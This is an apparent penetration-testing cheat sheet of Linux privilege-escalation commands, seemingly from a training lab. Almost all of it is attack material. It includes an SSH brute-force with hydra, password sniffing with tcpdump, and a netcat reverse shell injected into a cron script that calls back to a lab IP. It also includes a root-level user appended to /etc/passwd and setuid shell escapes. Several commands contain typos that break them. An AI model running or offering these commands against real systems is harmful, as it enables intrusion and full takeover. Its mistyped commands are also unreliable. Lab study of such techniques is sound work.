id
cat /etc/passwd
hostname
cat /etc/issue
cat /etc/os-release
uname -a
ps aux
ip a
ifconfig a
route/routel
# active connections, open ports
ss -anp
# firewall
cat /etc/iptables
# scheduled tasks
ls -lah /etc/cron*
crontab -l
sudo crontab -l
# pmanually installed package managers
dpkg -l
# find writable files
find -writable -type d 2>/dev/null
# list mounted file systems
mount
cat /etc/fstab # list all drives mounted at boot time
lsblk # all available disks
lsmod # enumerate kernel modules
/sbin/modinfo <module> # info about specific module
# setuid, setgid
# search
find / -perm -u=s -type f 2>/dev/null
#
unix-privesc-check
./unix-privesc-check standard > output.txt
.bashrc
# create wordlist for bruteforce
crunch 6 6 -t Lab%%% > wordlist
# bruteforce with hydra
hydra -1 eve -P wordlist 192.168.129.214 -t 4 ssh
sudo -l
sudo -i
#watch system activities that holds passwords or other
watch -n 1 "ps - aux I grep pass"
sudo tcpdump -i lo -A | grep "pass"
# abusing Cron jobs
grep "CRON" /var/log/syslog
# revshell
joe@debian-privesc:~/.scripts echo "rm /tmp/f;mkfifo /tmp/f;cat/tmp/f|/bin/sh -i 2>&1|nc
192.168.119.129 1234 >/tmp/f" >> user_backups.sh
if we can write /etc/passwd
openssl passwd PASS
echo "root2:16zpgl8z18tp6:0:0:root:/root:/bin/bash" >> /etc/passwd
grep Uid /proc/5489/status
# if find has setuid
find /home/joe/Desktop -exec "/us/bin/bash" -p\;
find /bin -perm -4000 # find setuid
# search cap_setuid files
/usr/sbin/getcap -r / 2>/dev/null
# https://gtfobins.github.io/gtfobins/perl/#capabilities
# contains examples for some cap_setuid we could find
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
sudo -l
cat /etc/sudoes
# example tcpdump (gtfobins)
# big command failed
cat /var/log/syslog | grep tcpdump
# apparmor blocked our gtfobins
# example apt-get
sudo apt-get changelog apt
### Exploiting Kernel Vulnerabilities
cat /etc/issue
uname -r
arch
kali@kali:~$ searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" grep "4
." | grep -v " < 4.4.0" | grep -v "4.8"